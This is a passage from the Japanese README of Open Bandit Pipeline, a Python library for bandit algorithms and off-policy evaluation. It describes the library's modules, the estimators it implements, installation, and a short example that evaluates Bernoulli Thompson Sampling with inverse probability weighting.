estimator) \u306e\u5b9f\u88c5\u306b\u96c6\u4e2d\u3057\u3066\u73fe\u5b9f\u7684\u3067\u518d\u73fe\u6027\u306e\u3042\u308b\u65b9\u6cd5\u3067\u4ed6\u306e\u624b\u6cd5\u3068\u306e\u6027\u80fd\u6bd4\u8f03\u3092\u884c\u3046\u3053\u3068\u304c\u3067\u304d\u308b\u3088\u3046\u306b\u306a\u308a\u307e\u3059.\n\u30aa\u30d5\u65b9\u7b56\u8a55\u4fa1(Off-Policy Evaluation)\u306b\u3064\u3044\u3066\u306f, [\u3053\u3061\u3089\u306e\u30d6\u30ed\u30b0\u8a18\u4e8b](https://techblog.zozo.com/entry/openbanditproject)\u3092\u3054\u78ba\u8a8d\u304f\u3060\u3055\u3044.\n\n
\n
\n

\n \u56f33. Open Bandit Pipeline\u306e\u69cb\u6210\n

\n
\n\nOpen Bandit Pipeline\u306f, \u4ee5\u4e0b\u306e\u4e3b\u8981\u30e2\u30b8\u30e5\u30fc\u30eb\u3067\u69cb\u6210\u3055\u308c\u3066\u3044\u307e\u3059.\n\n- [**dataset\u30e2\u30b8\u30e5\u30fc\u30eb**](./obp/dataset): \u3053\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u306f, Open Bandit Dataset\u7528\u306e\u30c7\u30fc\u30bf\u8aad\u307f\u8fbc\u307f\u30af\u30e9\u30b9\u3068\u30c7\u30fc\u30bf\u306e\u524d\u51e6\u7406\u3059\u308b\u305f\u3081\u306e\u67d4\u8edf\u306a\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30fc\u30b9\u3092\u63d0\u4f9b\u3057\u307e\u3059. \u307e\u305f\u4eba\u5de5\u30c7\u30fc\u30bf\u3092\u751f\u6210\u3059\u308b\u30af\u30e9\u30b9\u3084\u591a\u30af\u30e9\u30b9\u5206\u985e\u30c7\u30fc\u30bf\u3092\u30d0\u30f3\u30c7\u30a3\u30c3\u30c8\u30c7\u30fc\u30bf\u306b\u5909\u63db\u3059\u308b\u305f\u3081\u306e\u30af\u30e9\u30b9\u3082\u5b9f\u88c5\u3057\u3066\u3044\u307e\u3059.\n- [**policy\u30e2\u30b8\u30e5\u30fc\u30eb**](./obp/policy): \u3053\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u306f, \u30d0\u30f3\u30c7\u30a3\u30c3\u30c8\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u306e\u305f\u3081\u306e\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30a4\u30b9\u3092\u63d0\u4f9b\u3057\u307e\u3059. \u52a0\u3048\u3066, \u3044\u304f\u3064\u304b\u306e\u6a19\u6e96\u306a\u30d0\u30f3\u30c7\u30a3\u30c3\u30c8\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u5b9f\u88c5\u3057\u3066\u3044\u307e\u3059.\n- [**ope\u30e2\u30b8\u30e5\u30fc\u30eb**](./obp/ope):\u3000\u3053\u306e\u30e2\u30b8\u30e5\u30fc\u30eb\u306f, \u3044\u304f\u3064\u304b\u306e\u6a19\u6e96\u7684\u306a\u30aa\u30d5\u65b9\u7b56\u63a8\u5b9a\u91cf\u3092\u5b9f\u88c5\u3057\u3066\u3044\u307e\u3059. \u307e\u305f\u65b0\u305f\u306b\u30aa\u30d5\u65b9\u7b56\u63a8\u5b9a\u91cf\u3092\u5b9f\u88c5\u3059\u308b\u305f\u3081\u306e\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30fc\u30b9\u3082\u63d0\u4f9b\u3057\u3066\u3044\u307e\u3059.\n\n\n### \u5b9f\u88c5\u3055\u308c\u3066\u3044\u308b\u30d0\u30f3\u30c7\u30a3\u30c3\u30c8\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3068\u30aa\u30d5\u65b9\u7b56\u63a8\u5b9a\u91cf\n\n
\n\u30d0\u30f3\u30c7\u30a3\u30c3\u30c8\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0 (policy module\u306b\u5b9f\u88c5)\n\n- Online\n - Non-Contextual (Context-free)\n - Random\n - Epsilon Greedy\n - Bernoulli Thompson Sampling\n - Contextual (Linear)\n - Linear Epsilon Greedy\n - [Linear Thompson Sampling](http://proceedings.mlr.press/v28/agrawal13)\n - [Linear Upper Confidence Bound](https://dl.acm.org/doi/pdf/10.1145/1772690.1772758)\n - Contextual (Logistic)\n - Logistic Epsilon Greedy\n - [Logistic Thompson Sampling](https://papers.nips.cc/paper/4321-an-empirical-evaluation-of-thompson-sampling)\n - [Logistic Upper Confidence Bound](https://dl.acm.org/doi/10.1145/2396761.2396767)\n- Offline (Off-Policy Learning)\n - [Inverse Probability Weighting (IPW) Learner](https://arxiv.org/abs/1503.02834)\n - Neural Network-based Policy Learner\n\n
\n\n
\n\u30aa\u30d5\u65b9\u7b56\u63a8\u5b9a\u91cf (ope module\u306b\u5b9f\u88c5)\n\n- OPE of Online Bandit Algorithms\n - [Replay Method (RM)](https://arxiv.org/abs/1003.5956)\n- OPE of Offline Bandit Algorithms\n - [Direct Method (DM)](https://arxiv.org/abs/0812.4044)\n - [Inverse Probability Weighting (IPW)](https://scholarworks.umass.edu/cgi/viewcontent.cgi?article=1079&context=cs_faculty_pubs)\n - [Self-Normalized Inverse Probability Weighting (SNIPW)](https://papers.nips.cc/paper/5748-the-self-normalized-estimator-for-counterfactual-learning)\n - [Doubly Robust (DR)](https://arxiv.org/abs/1503.02834)\n - [Switch Estimators](https://arxiv.org/abs/1612.01205)\n - [More Robust Doubly Robust (MRDR)](https://arxiv.org/abs/1802.03493)\n - [Doubly Robust with Optimistic Shrinkage (DRos)](https://arxiv.org/abs/1907.09623)\n - [Double Machine Learning (DML)](https://arxiv.org/abs/2002.08536)\n- OPE of Offline Slate Bandit Algorithms\n - [Independent Inverse Propensity Scoring (IIPS)](https://arxiv.org/abs/1804.10488)\n - [Reward Interaction Inverse Propensity Scoring (RIPS)](https://arxiv.org/abs/2007)\n- OPE of Offline Bandit Algorithms with Continuous Actions\n - [Kernelized Inverse Probability Weighting](https://arxiv.org/abs/1802.06037)\n - [Kernelized Self-Normalized Inverse Probability Weighting](https://arxiv.org/abs/1802.06037)\n - [Kernelized Doubly Robust](https://arxiv.org/abs/1802.06037)\n\n
\n\nOpen Bandit Pipeline\u306f, \u4e0a\u8a18\u306e\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3084\u30aa\u30d5\u65b9\u7b56\u63a8\u5b9a\u91cf\u306b\u52a0\u3048\u3066\u67d4\u8edf\u306a\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30fc\u30b9\u3082\u63d0\u4f9b\u3057\u3066\u3044\u307e\u3059.\n\u3057\u305f\u304c\u3063\u3066\u7814\u7a76\u8005\u306f, \u72ec\u81ea\u306e\u30d0\u30f3\u30c7\u30a3\u30c3\u30c8\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3084\u63a8\u5b9a\u91cf\u3092\u5bb9\u6613\u306b\u5b9f\u88c5\u3059\u308b\u3053\u3068\u3067\u305d\u308c\u3089\u306e\u6027\u80fd\u3092\u8a55\u4fa1\u3067\u304d\u307e\u3059.\n\u3055\u3089\u306bOpen Bandit Pipeline\u306f, \u5b9f\u30d0\u30f3\u30c7\u30a3\u30c3\u30c8\u30d5\u30a3\u30fc\u30c9\u30d0\u30c3\u30af\u30c7\u30fc\u30bf\u3092\u6271\u3046\u305f\u3081\u306e\u30a4\u30f3\u30bf\u30d5\u30a7\u30fc\u30b9\u3092\u542b\u3093\u3067\u3044\u307e\u3059.\n\u3057\u305f\u304c\u3063\u3066, \u30a8\u30f3\u30b8\u30cb\u30a2\u3084\u30c7\u30fc\u30bf\u30b5\u30a4\u30a8\u30f3\u30c6\u30a3\u30b9\u30c8\u306a\u3069\u306e\u5b9f\u8df5\u8005\u306f, \u81ea\u793e\u306e\u30c7\u30fc\u30bf\u30bb\u30c3\u30c8\u3092Open Bandit Pipeline\u3068\u7d44\u307f\u5408\u308f\u305b\u308b\u3053\u3068\u3067\u7c21\u5358\u306b\u30aa\u30d5\u65b9\u7b56\u8a55\u4fa1\u3092\u884c\u3046\u3053\u3068\u304c\u3067\u304d\u307e\u3059.\n\n## \u30c8\u30d4\u30c3\u30af\u3068\u30bf\u30b9\u30af\n\nOpen Bandit Dataset\u53ca\u3073Open Bandit Pipeline\u3067\u306f, \u4ee5\u4e0b\u306e\u7814\u7a76\u30c6\u30fc\u30de\u306b\u95a2\u3059\u308b\u5b9f\u9a13\u8a55\u4fa1\u3092\u884c\u3046\u3053\u3068\u304c\u3067\u304d\u307e\u3059.\n\n- **\u30d0\u30f3\u30c7\u30a3\u30c3\u30c8\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u306e\u6027\u80fd\u8a55\u4fa1 (Evaluation of Bandit Algorithms)**\uff1aOpen Bandit Dataset\u306b\u306f, \u30e9\u30f3\u30c0\u30e0\u65b9\u7b56\u306b\u3088\u3063\u3066\u53ce\u96c6\u3055\u308c\u305f\u5927\u898f\u6a21\u306a\u30ed\u30b0\u30c7\u30fc\u30bf\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059. \u305d\u308c\u3092\u7528\u3044\u308b\u3053\u3068\u3067, \u65b0\u3057\u3044\u30aa\u30f3\u30e9\u30a4\u30f3\u30d0\u30f3\u30c7\u30a3\u30c3\u30c8\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u306e\u6027\u80fd\u3092\u8a55\u4fa1\u3059\u308b\u3053\u3068\u304c\u53ef\u80fd\u3067\u3059.\n\n- **\u30aa\u30d5\u65b9\u7b56\u8a55\u4fa1\u306e\u6b63\u78ba\u3055\u306e\u8a55\u4fa1 (Evaluation of Off-Policy Evaluation)**\uff1aOpen Bandit Dataset\u306f, \u8907\u6570\u306e\u65b9\u7b56\u3092\u5b9f\u30b7\u30b9\u30c6\u30e0\u4e0a\u3067\u540c\u6642\u306b\u8d70\u3089\u305b\u308b\u3053\u3068\u306b\u3088\u308a\u751f\u6210\u3055\u308c\u305f\u30ed\u30b0\u30c7\u30fc\u30bf\u3067\u69cb\u6210\u3055\u308c\u3066\u3044\u307e\u3059. \u307e\u305fOpen Bandit Pipeline\u3092\u7528\u3044\u308b\u3053\u3068\u3067, \u30c7\u30fc\u30bf\u53ce\u96c6\u306b\u7528\u3044\u3089\u308c\u305f\u65b9\u7b56\u3092\u518d\u73fe\u3067\u304d\u307e\u3059. \u305d\u306e\u305f\u3081, \u30aa\u30d5\u65b9\u7b56\u63a8\u5b9a\u91cf\u306e\u63a8\u5b9a\u7cbe\u5ea6\u306e\u8a55\u4fa1\u3092\u884c\u3046\u3053\u3068\u304c\u3067\u304d\u307e\u3059.\n\n\n# \u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\n\n\u4ee5\u4e0b\u306e\u901a\u308a, `pip`\u3092\u7528\u3044\u3066Open Bandit Pipeline\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3067\u304d\u307e\u3059.\n\n```bash\npip install obp\n```\n\n\u307e\u305f, \u672c\u30ea\u30dd\u30b8\u30c8\u30ea\u3092clone\u3057\u3066\u30bb\u30c3\u30c8\u30a2\u30c3\u30d7\u3059\u308b\u3053\u3068\u3082\u3067\u304d\u307e\u3059.\n\n```bash\ngit clone https://github.com/st-tech/zr-obp\ncd zr-obp\npython setup.py install\n```\n\nPython\u304a\u3088\u3073\u5229\u7528\u30d1\u30c3\u30b1\u30fc\u30b8\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u306f\u4ee5\u4e0b\u306e\u901a\u308a\u3067\u3059\u3002\n\n```\n[tool.poetry.dependencies]\npython = \">=3.7.1,<3.10\"\ntorch = \"^1.9.0\"\nscikit-learn = \"^0.24.2\"\npandas = \"^1.3.2\"\nnumpy = \"^1.21.2\"\nmatplotlib = \"^3.4.3\"\ntqdm = \"^4.62.2\"\nscipy = \"^1.7.1\"\nPyYAML = \"^5.4.1\"\nseaborn = \"^0.11.2\"\npyieoe = \"^0.1.1\"\npingouin = \"^0.4.0\"\n```\n\n\u3053\u308c\u3089\u306e\u30d1\u30c3\u30b1\u30fc\u30b8\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u304c\u7570\u306a\u308b\u3068\u3001\u4f7f\u7528\u65b9\u6cd5\u3084\u6319\u52d5\u304c\u672c\u66f8\u57f7\u7b46\u6642\u70b9\u3068\u7570\u306a\u308b\u5834\u5408\u304c\u3042\u308b\u306e\u3067\u3001\u6ce8\u610f\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n# \u4f7f\u7528\u65b9\u6cd5\n\n\u3053\u3053\u3067\u306f, Open Bandit Pipeline\u306e\u4f7f\u7528\u6cd5\u3092\u8aac\u660e\u3057\u307e\u3059. \u5177\u4f53\u4f8b\u3068\u3057\u3066, Open Bandit Dataset\u3092\u7528\u3044\u3066, \u30c8\u30f3\u30d7\u30bd\u30f3\u62bd\u51fa\u65b9\u7b56\u306e\u6027\u80fd\u3092\u30aa\u30d5\u30e9\u30a4\u30f3\u8a55\u4fa1\u3059\u308b\u6d41\u308c\u3092\u5b9f\u88c5\u3057\u307e\u3059. \u4eba\u5de5\u30c7\u30fc\u30bf\u3084\u591a\u30af\u30e9\u30b9\u5206\u985e\u30c7\u30fc\u30bf\u3092\u7528\u3044\u305f\u30aa\u30d5\u65b9\u7b56\u8a55\u4fa1\u306e\u5b9f\u88c5\u6cd5\u306f, [\u82f1\u8a9e\u7248\u306eREAMDE](https://github.com/st-tech/zr-obp/blob/master/README.md)\u3084[examples/quickstart/](https://github.com/st-tech/zr-obp/tree/master/examples/quickstart)\u3092\u3054\u78ba\u8a8d\u304f\u3060\u3055\u3044.\n\n\u4ee5\u4e0b\u306b\u793a\u3059\u3088\u3046\u306b, \u7d0410\u884c\u306e\u30b3\u30fc\u30c9\u3067\u30aa\u30d5\u65b9\u7b56\u8a55\u4fa1\u306e\u6d41\u308c\u3092\u5b9f\u88c5\u3067\u304d\u307e\u3059.\n\n```python\n# Inverse Probability Weighting\u3068\u30e9\u30f3\u30c0\u30e0\u65b9\u7b56\u306b\u3088\u3063\u3066\u751f\u6210\u3055\u308c\u305f\u30ed\u30b0\u30c7\u30fc\u30bf\u3092\u7528\u3044\u3066, BernoulliTS\u306e\u6027\u80fd\u3092\u30aa\u30d5\u30e9\u30a4\u30f3\u3067\u8a55\u4fa1\u3059\u308b\nfrom obp.dataset import OpenBanditDataset\nfrom obp.policy import BernoulliTS\nfrom obp.ope import OffPolicyEvaluation, InverseProbabilityWeighting as IPW\n\n# (1) \u30c7\u30fc\u30bf\u306e\u8aad\u307f\u8fbc\u307f\u3068\u524d\u51e6\u7406\ndataset = OpenBanditDataset(behavior_policy='random', campaign='all')\nbandit_feedback = dataset.obtain_batch_bandit_feedback()\n\n# (2) \u30aa\u30d5\u65b9\u7b56\u5b66\u7fd2\nevaluation_policy = BernoulliTS(\n n_actions=dataset.n_actions,\n len_list=dataset.len_list,\n is_zozotown_prior=True,\n campaign=\"all\",\n random_state=12345\n)\naction_dist = evaluation_policy.compute_batch_action_dist(\n n_sim=100000, n_rounds=bandit_feedback[\"n_rounds\"]\n)\n\n# (3) \u30aa\u30d5\u65b9\u7b56\u8a55\u4fa1\nope = OffPolicyEvaluation(bandit_feedback=bandit_feedback, ope_estimators=[IPW()])\nestimated_policy_value = ope.estimate_policy_values(action_dist=action_dist)\n\n# \u30e9\u30f3\u30c0\u30e0\u65b9\u7b56\u306b\u5bfe\u3059\u308b\u30c8\u30f3\u30d7\u30bd\u30f3\u62bd\u51fa\u65b9\u7b56\u306e\u6027\u80fd\u306e\u6539\u5584\u7387\uff08\u76f8\u5bfe\u30af\u30ea\u30c3\u30af\u7387\uff09\nrelative_policy_value_of_bernoulli_ts = estimated_policy_value['ipw'] / bandit_feedback['reward'].mean()\nprint(relative_policy_value_of_bernoulli_ts)\n1.198126...\n```\n\n\u4ee5\u4e0b, \u91cd\u8981\u306a\u8981\u7d20\u306b\u3064\u3044\u3066\u8aac\u660e\u3057\u307e\u3059.\n\n## (1) \u30c7\u30fc\u30bf\u306e\u8aad\u307f\u8fbc\u307f\u3068\u524d\u51e6\u7406\n\nOpen Bandit Pipeline\u306b\u306f, Open Bandit Dataset\u7528\u306e\u30c7\u30fc\u30bf\u8aad\u307f\u8fbc\u307f\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30fc\u30b9\u3092\u7528\u610f\u3057\u3066\u3044\u307e\u3059.\n\u3053\u308c\u3092\u7528\u3044\u308b\u3053\u3068\u3067, Open Bandit Dataset\u306e\u8aad\u307f\u8fbc\u307f\u3084\u524d\u51e6\u7406\u3092\u7c21\u6f54\u306b\u884c\u3046\u3053\u3068\u304c\u3067\u304d\u307e\u3059.\n\n```python\n# \u300c\u5168\u30a2\u30a4\u30c6\u30e0\u30ad\u30e3\u30f3\u30da\u30fc\u30f3 (all)\u300d\u306b\u304a\u3044\u3066\u30e9\u30f3\u30c0\u30e0\u65b9\u7b56\u304c\u96c6\u3081\u305f\u30ed\u30b0\u30c7\u30fc\u30bf\u3092\u8aad\u307f\u8fbc\u3080.\n# OpenBanditDataset\u30af\u30e9\u30b9\u306b\u306f\u30c7\u30fc\u30bf\u3092\u53ce\u96c6\u3057\u305f\u65b9\u7b56\u3068\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3092\u6307\u5b9a\u3059\u308b.\ndataset = OpenBanditDataset(behavior_policy='random', campaign='all')\n\n# \u30aa\u30d5\u65b9\u7b56\u5b66\u7fd2\u3084\u30aa\u30d5\u65b9\u7b56\u8a55\u4fa1\u306b\u7528\u3044\u308b\u30ed\u30b0\u30c7\u30fc\u30bf\u3092\u5f97\u308b.\nbandit_feedback = dataset.obtain_batch_bandit_feedback()\n\nprint(bandit_feedback.keys())\n# dict_keys(['n_rounds', 'n_actions', 'action', 'position', 'reward', 'pscore', 'context', 'action_context'])\n```\n\n`obp.dataset.OpenBanditDataset` \u30af\u30e9\u30b9\u306e `pre_process` \u30e1\u30bd\u30c3\u30c9\u306b, \u72ec\u81ea\u306e\u7279\u5fb4\u91cf\u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u3092\u5b9f\u88c5\u3059\u308b\u3053\u3068\u3082\u3067\u304d\u307e\u3059. [`custom_dataset.py`](https://github.com/st-tech/zr-obp/blob/master/benchmark/cf_policy_search/custom_dataset.py)\u306b\u306f, \u65b0\u3057\u3044\u7279\u5fb4\u91cf\u30a8\u30f3\u30b8\u30cb\u30a2\u30ea\u30f3\u30b0\u3092\u5b9f\u88c5\u3059\u308b\u4f8b\u3092\u793a\u3057\u3066\u3044\u307e\u3059. \u307e\u305f, `obp.dataset.BaseBanditDataset`\u30af\u30e9\u30b9\u306e\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30fc\u30b9\u306b\u5f93\u3063\u3066\u65b0\u305f\u306a\u30af\u30e9\u30b9\u3092\u5b9f\u88c5\u3059\u308b\u3053\u3068\u3067, \u5c06\u6765\u516c\u958b\u3055\u308c\u308b\u3067\u3042\u308d\u3046Open Bandit Dataset\u4ee5\u5916\u306e\u30d0\u30f3\u30c7\u30a3\u30c3\u30c8\u30c7\u30fc\u30bf\u30bb\u30c3\u30c8\u3084\u81ea\u793e\u306b\u7279\u6709\u306e\u30d0\u30f3\u30c7\u30a3\u30c3\u30c8\u30c7\u30fc\u30bf\u3092\u6271\u3046\u3053\u3068\u3082\u3067\u304d\u307e\u3059.\n\n## (2) \u30aa\u30d5\u65b9\u7b56\u5b66\u7fd2\n\n\u524d\u51e6\u7406\u306e\u5f8c\u306f, \u6b21\u306e\u3088\u3046\u306b\u3057\u3066**\u30aa\u30d5\u65b9\u7b56\u5b66\u7fd2**\u3092\u5b9f\u884c\u3057\u307e\u3059.\n\n```python\n# \u8a55\u4fa1\u5bfe\u8c61\u306e\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u5b9a\u7fa9. \u3053\u3053\u3067\u306f, \u30c8\u30f3\u30d7\u30bd\u30f3\u62bd\u51fa\u65b9\u7b56\u306e\u6027\u80fd\u3092\u30aa\u30d5\u30e9\u30a4\u30f3\u8a55\u4fa1\u3059\u308b.\n# \u7814\u7a76\u8005\u304c\u72ec\u81ea\u306b\u5b9f\u88c5\u3057\u305f\u30d0\u30f3\u30c7\u30a3\u30c3\u30c8\u65b9\u7b56\u3092\u7528\u3044\u308b\u3053\u3068\u3082\u3067\u304d\u308b.\nevaluation_policy = BernoulliTS(\n n_actions=dataset.n_actions,\n len_list=dataset.len_list,\n is_zozotown_prior=True, # ZOZOTOWN\u4e0a\u3067\u306e\u6319\u52d5\u3092\u518d\u73fe\n campaign=\"all\",\n random_state=12345\n)\n# \u30b7\u30df\u30e5\u30ec\u30fc\u30b7\u30e7\u30f3\u3092\u7528\u3044\u3066\u3001\u30c8\u30f3\u30d7\u30bd\u30f3\u62bd\u51fa\u65b9\u7b56\u306b\u3088\u308b\u884c\u52d5\u9078\u629e\u78ba\u7387\u3092\u7b97\u51fa.\naction_dist = evaluation_policy.compute_batch_action_dist(\n n_sim=100000, n_rounds=bandit_feedback[\"n_rounds\"]\n)\n```\n\n`BernoulliTS`\u306e`compute_batch_action_dist`\u30e1\u30bd\u30c3\u30c9\u306f, \u4e0e\u3048\u3089\u308c\u305f\u30d9\u30fc\u30bf\u5206\u5e03\u306e\u30d1\u30e9\u30e1\u30fc\u30bf\u306b\u57fa\u3065\u3044\u305f\u884c\u52d5\u9078\u629e\u78ba\u7387(`action_dist`)\u3092\u30b7\u30df\u30e5\u30ec\u30fc\u30b7\u30e7\u30f3\u306b\u3088\u3063\u3066\u7b97\u51fa\u3057\u307e\u3059. \u307e\u305f\u30e6\u30fc\u30b6\u306f[`./obp/policy/base.py`](https://github.com/st-tech/zr-obp/blob/master/obp/policy/base.py)\u306b\u5b9f\u88c5\u3055\u308c\u3066\u3044\u308b\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30fc\u30b9\u306b\u5f93\u3046\u3053\u3068\u3067\u72ec\u81ea\u306e\u30d0\u30f3\u30c7\u30a3\u30c3\u30c8\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u3092\u5b9f\u88c5\u3057, \u305d\u306e\u6027\u80fd\u3092\u8a55\u4fa1\u3059\u308b\u3053\u3068\u3082\u3067\u304d\u307e\u3059.\n\n\n## (3) \u30aa\u30d5\u65b9\u7b56\u8a55\u4fa1 \uff08Off-Policy Evaluation\uff09\n\n\u6700\u5f8c\u306e\u30b9\u30c6\u30c3\u30d7\u306f, \u30ed\u30b0\u30c7\u30fc\u30bf\u3092\u7528\u3044\u3066\u30d0\u30f3\u30c7\u30a3\u30c3\u30c8\u30a2\u30eb\u30b4\u30ea\u30ba\u30e0\u306e\u6027\u80fd\u3092\u30aa\u30d5\u30e9\u30a4\u30f3\u8a55\u4fa1\u3059\u308b**\u30aa\u30d5\u65b9\u7b56\u8a55\u4fa1**\u3067\u3059.\nOpen Bandit Pipeline\u3092\u4f7f\u3046\u3053\u3068\u3067, \u6b21\u306e\u3088\u3046\u306b\u30aa\u30d5\u65b9\u7b56\u8a55\u4fa1\u3092\u5b9f\u88c5\u3067\u304d\u307e\u3059.\n\n```python\n# IPW\u63a8\u5b9a\u91cf\u3092\u7528\u3044\u3066\u30c8\u30f3\u30d7\u30bd\u30f3\u62bd\u51fa\u65b9\u7b56\u306e\u6027\u80fd\u3092\u30aa\u30d5\u30e9\u30a4\u30f3\u8a55\u4fa1\u3059\u308b.\n# OffPolicyEvaluation\u30af\u30e9\u30b9\u306b\u306f, \u30aa\u30d5\u30e9\u30a4\u30f3\u8a55\u4fa1\u306b\u7528\u3044\u308b\u30ed\u30b0\u30d0\u30f3\u30c7\u30a3\u30c3\u30c8\u30c7\u30fc\u30bf\u3068\u7528\u3044\u308b\u63a8\u5b9a\u91cf\u3092\u6e21\u3059\uff08\u8907\u6570\u8a2d\u5b9a\u53ef\uff09.\nope = OffPolicyEvaluation(bandit_feedback=bandit_feedback, ope_estimators=[IPW()])\nestimated_policy_value = ope.estimate_policy_values(action_dist=action_dist)\nprint(estimated_policy_value)\n{'ipw': 0.004553...}\u3000# \u8a2d\u5b9a\u3055\u308c\u305f\u30aa\u30d5\u65b9\u7b56\u63a8\u5b9a\u91cf\u306b\u3088\u308b\u6027\u80fd\u306e\u63a8\u5b9a\u5024\u3092\u542b\u3093\u3060\u8f9e\u66f8.\n\n# \u30c8\u30f3\u30d7\u30bd\u30f3\u62bd\u51fa\u65b9\u7b56\u306e\u6027\u80fd\u306e\u63a8\u5b9a\u5024\u3068\u30e9\u30f3\u30c0\u30e0\u65b9\u7b56\u306e\u771f\u306e\u6027\u80fd\u3092\u6bd4\u8f03\u3059\u308b.\nrelative_policy_value_of_bernoulli_ts = estimated_policy_value['ipw'] / bandit_feedback['reward'].mean()\n# \u30aa\u30d5\u65b9\u7b56\u8a55\u4fa1\u306b\u3088\u3063\u3066, \u30c8\u30f3\u30d7\u30bd\u30f3\u62bd\u51fa\u65b9\u7b56\u306e\u6027\u80fd\u306f\u30e9\u30f3\u30c0\u30e0\u65b9\u7b56\u306e\u6027\u80fd\u309219.81%\u4e0a\u56de\u308b\u3068\u63a8\u5b9a\u3055\u308c\u305f.\nprint(relative_policy_value_of_bernoulli_ts)\n1.198126...\n```\n\n`obp.ope.BaseOffPolicyEstimator` \u30af\u30e9\u30b9\u306e\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30fc\u30b9\u306b\u5f93\u3046\u3053\u3068\u3067, \u72ec\u81ea\u306e\u30aa\u30d5\u65b9\u7b56\u63a8\u5b9a\u91cf\u3092\u5b9f\u88c5\u3059\u308b\u3053\u3068\u3082\u3067\u304d\u307e\u3059. \u3053\u308c\u306b\u3088\u308a\u65b0\u305f\u306a\u30aa\u30d5\u65b9\u7b56\u63a8\u5b9a\u91cf\u306e\u63a8\u5b9a\u7cbe\u5ea6\u3092\u691c\u8a3c\u3059\u308b\u3053\u3068\u304c\u53ef\u80fd\u3067\u3059.\n\u307e\u305f, `obp.ope.OffPolicyEvaluation`\u306e`ope_estimators`\u306b\u8907\u6570\u306e\u30aa\u30d5\u65b9\u7b56\u63a8\u5b9a\u91cf\u3092\u8a2d\u5b9a\u3059\u308b\u3053\u3068\u3067, \u8907\u6570\u306e\u63a8\u5b9a\u91cf\u306b\u3088\u308b\u63a8\u5b9a\u5024\u3092\u540c\u6642\u306b\u5f97\u308b\u3053\u3068\u3082\u53ef\u80fd\u3067\u3059. `bandit_feedback['reward'].mean()` \u306f\u89b3\u6e2c\u3055\u308c\u305f\u5831\u916c\u306e\u7d4c\u9a13\u5e73\u5747\u5024\uff08\u30aa\u30f3\u65b9\u7b56\u63a8\u5b9a\uff09\u3067\u3042\u308a, \u30e9\u30f3\u30c0\u30e0\u65b9\u7b56\u306e\u771f\u306e\u6027\u80fd\u3092\u8868\u3057\u307e\u3059.\n\n\n# \u5f15\u7528\nOpen Bandit Dataset\u3084Open Bandit Pipeline\u3092\u6d3b\u7528\u3057\u3066\u8ad6\u6587\u3084\u30d6\u30ed\u30b0\u8a18\u4e8b\u7b49\u3092\u57f7\u7b46\u3055\u308c\u305f\u5834\u5408, \u4ee5\u4e0b\u306e\u8ad6\u6587\u3092\u5f15\u7528\u3057\u3066\u3044\u305f\u3060\u304f\u3088\u3046\u304a\u9858\u3044\u3044\u305f\u3057\u307e\u3059.\n\nYuta Saito, Shunsuke Aihara, Megumi Matsutani, Yusuke Narita.
\n**Open Bandit Dataset and Pipeline: Towards Realistic and Reproducible Off-Policy Evaluation**
\n[https://arxiv.org/abs/2008.07146](https://arxiv.org/abs/2008.07146)\n\nBibtex:\n```\n@article{saito2020open,\n title={Open Bandit Dataset and Pipeline: Towards Realistic and Reproducible Off-Policy Evaluation},\n author={Saito, Yuta and Shunsuke, Aihara and Megumi, Matsutani and Yusuke, Narita},\n journal={arXiv preprint arXiv:2008.07146},\n year={2020}\n}\n```\n\n# Google Group\n\u672c\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u306b\u95a2\u3059\u308b\u6700\u65b0\u60c5\u5831\u306f\u6b21\u306eGoogle Group\u306b\u3066\u968f\u6642\u304a\u77e5\u3089\u305b\u3057\u3066\u3044\u307e\u3059. \u305c\u3072\u3054\u767b\u9332\u304f\u3060\u3055\u3044: https://groups.google.com/g/open-bandit-project\n\n# \u30b3\u30f3\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\nOpen Bandit Pipeline\u3078\u306e\u3069\u3093\u306a\u8ca2\u732e\u3082\u6b53\u8fce\u3044\u305f\u3057\u307e\u3059. \u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u306b\u8ca2\u732e\u3059\u308b\u305f\u3081\u306e\u30ac\u30a4\u30c9\u30e9\u30a4\u30f3\u306f, [CONTRIBUTING.md](./CONTRIBUTING.md)\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002\n\n# \u30e9\u30a4\u30bb\u30f3\u30b9\n\u3053\u306e\u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u306fApache 2.0\u30e9\u30a4\u30bb\u30f3\u30b9\u3092\u63a1\u7528\u3057\u3066\u3044\u307e\u3059. \u8a73\u7d30\u306f, [LICENSE](https://github.com/st-tech/zr-obp/blob/master/LICENSE)\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044.\n\n# \u30d7\u30ed\u30b8\u30a7\u30af\u30c8\u30c1\u30fc\u30e0\n\n- [\u9f4b\u85e4\u512a\u592a](https://usait0.com/ja/) (**Main Contributor**; \u534a\u719f\u4eee\u60f3\u682a\u5f0f\u4f1a\u793e / 